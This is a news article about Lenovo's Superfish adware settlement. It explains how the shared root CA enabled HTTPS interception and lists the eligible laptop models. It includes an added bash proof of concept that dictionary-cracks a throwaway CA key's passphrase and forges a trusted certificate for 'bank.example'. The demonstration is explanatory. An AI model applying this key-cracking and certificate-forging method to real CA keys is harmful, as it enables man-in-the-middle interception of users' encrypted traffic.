Lenovo will pay laptop owners $8.3 million in compensation for installing Superfish malware
The Superfish CA certificate in the Windows certificate store
In February 2015, Lenovo was found to have shipped laptops with VisualDiscovery, adware developed by Superfish. On closer examination it turned out to be typical malware: it listens to the user's traffic, analyzes search queries and injects advertisements into the pages of third-party sites. To do this for HTTPS as well, the application installs a Superfish root CA certificate in the Windows trusted root store, ships the corresponding private key on the device, and runs a local proxy that terminates the browser's TLS connections and re-signs each remote site's certificate with that CA. The private key was password-protected, but a simple dictionary attack with the PEM key cracker pemcrack over 2,203 words recovered the password: komodia.
The story turned out to be extremely unpleasant overall. The malware had been preinstalled on Lenovo laptops since September 2014.
Further investigation revealed that the malware was installed on some 750,000 laptops across the following product lines: E-Series, Edge Series, Flex-Series, G-Series, Miix Series, S-Series, U-Series, Y-Series, Yoga Series and Z-Series.
The malware not only interfered with users' encrypted traffic. Because every affected laptop carried the same CA private key, protected by a trivial password, anyone who extracted it could sign a certificate for any site and mount a MitM attack against any other affected user on the same network, compromising the confidentiality of everything sent over HTTPS, including financial data.
The private key of the Superfish CA certificate
After the scandal broke, Lenovo published a tool to remove Superfish automatically, along with manual removal instructions. That did not spare it from punishment. First came a hacker attack that defaced Lenovo.com; now the Chinese company has been forced to pay compensation to the affected laptop owners.
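To make the weakness concrete, here is an added example (not from the original article, and not Superfish's or Lenovo's code) in bash using the openssl command-line tool. It builds a throwaway CA standing in for the shared Superfish root, protects its key with the weak passphrase komodia, recovers that passphrase with a dictionary loop in the spirit of pemcrack, and then uses the recovered key to issue a certificate for a hostname of the attacker's choosing, which a client that trusts the CA accepts. The CA subject, the hostname bank.example and the five-word dictionary are constructed for the demonstration; the real crack used a 2,203-word list.

```bash
#!/usr/bin/env bash
# Constructed demonstration of the Superfish weakness: one CA private key, shared
# by every device and protected only by a dictionary word, lets anyone who
# recovers it mint certificates that those devices will trust for any site.
# All key material here is freshly generated and throwaway, not the real Superfish key.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Stand-in for the CA the adware installed in every laptop's trusted root store.
# Assumption: the weak passphrase is "komodia" (the one reported for the real key).
make_shared_ca() {
    openssl req -x509 -newkey rsa:2048 -days 1 \
        -subj "/O=Constructed Example/CN=Constructed Superfish-like Root CA" \
        -keyout "$WORK/ca.key" -out "$WORK/ca.crt" \
        -passout pass:komodia 2>/dev/null
}

# The pemcrack idea in a few lines: try each dictionary word as the key
# passphrase and stop at the first one OpenSSL accepts. Prints the word.
crack_key_password() {
    local keyfile="$1" wordlist="$2" word
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        if openssl pkey -in "$keyfile" -passin "pass:$word" -noout 2>/dev/null; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# With the recovered passphrase, issue a leaf certificate for any hostname.
forge_site_cert() {
    local password="$1" host="$2"
    openssl genrsa -out "$WORK/leaf.key" 2048 2>/dev/null
    openssl req -new -key "$WORK/leaf.key" -subj "/CN=$host" -out "$WORK/leaf.csr" 2>/dev/null
    openssl x509 -req -in "$WORK/leaf.csr" -days 1 \
        -CA "$WORK/ca.crt" -CAkey "$WORK/ca.key" -passin "pass:$password" \
        -CAcreateserial -out "$WORK/leaf.crt" 2>/dev/null
}

# A client that trusts the shared CA (as every affected laptop did) accepts the
# forged certificate. Returns 0 when both the chain and the hostname verify.
forged_cert_is_trusted() {
    local host="$1"
    openssl verify -CAfile "$WORK/ca.crt" -verify_hostname "$host" "$WORK/leaf.crt" >/dev/null 2>&1
}

# Constructed mini-dictionary standing in for the 2,203-word list used in 2015.
printf '%s\n' password superfish lenovo komodia adware > "$WORK/words.txt"

make_shared_ca
FOUND="$(crack_key_password "$WORK/ca.key" "$WORK/words.txt")"
echo "recovered passphrase: $FOUND"
forge_site_cert "$FOUND" "bank.example"
if forged_cert_is_trusted "bank.example"; then
    echo "bank.example certificate forged and accepted by a client trusting the shared CA"
fi
```

The defence is not a stronger passphrase: a key that must live in plaintext on every customer's machine cannot be kept secret at all. A TLS-intercepting proxy that ships the same CA key everywhere is unsafe regardless of how the key file is encrypted; the only sound fix is to remove the CA from the trust store, which is what Lenovo's removal tool did.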
A class action lawsuit (PDF) was filed against Lenovo in the US District Court for the Northern District of California seeking compensation, and on November 21, 2018, the court granted preliminary approval.
The case never reached a court-ordered payout, however, because Lenovo settled with the plaintiffs' representatives for $7.3 million. That amount is added to the $1 million Lenovo had already set aside, so the fund for compensating affected American users now totals $8.3 million.
It should be noted that Lenovo had long disputed the plaintiffs' claims on the grounds that it "is not aware of any use of the Superfish program by third parties." It remained unconvinced, but expressed satisfaction that the 2.5-year process was finally over, according to an official press release that has since been taken down.
Legal fees will probably be deducted from the fund. If the compensation were divided among all 750,000 affected users, each would receive only about $10. That is very little for having a MitM proxy with ad injection installed: Amazon, for comparison, gives a $20 discount on a Kindle if the user agrees to view ads. So $10 per person is very cheap, and even beneficial for Lenovo, reputational damage aside.
In practice, though, the number of claimants is likely to be far below 750,000, so payouts will exceed $10. Compensation is available only to those who, between September 1, 2014 and February 28, 2015, bought one of the following laptop models in the United States:
- G Series: G410, G510, G710, G40-70, G50-70, G40-30, G50-30, G50-45
- U Series: U430P, U430Touch, U530Touch
- Y Series: Y40-70, Y50-70
- Z Series: Z50-75, Z40-70, Z50-70
- Flex Series: Flex2 14D, Flex2 15D, Flex2 14, Flex2 15, Flex2 15 (BTM), Flex 10
- MIIX Series: MIIX2-10, MIIX2-11
- YOGA Series: YOGA2Pro-13, YOGA2-13, YOGA2-11BTM, YOGA2-11HSW
The exact amount of compensation depends on how many users file claims with the fund. On top of this money, Lenovo has already paid $3.5 million in penalties under settlements with the Federal Trade Commission and the authorities of 32 states.
In Russia, as far as is known, no class action has been filed against Lenovo, so no compensation has been provided there.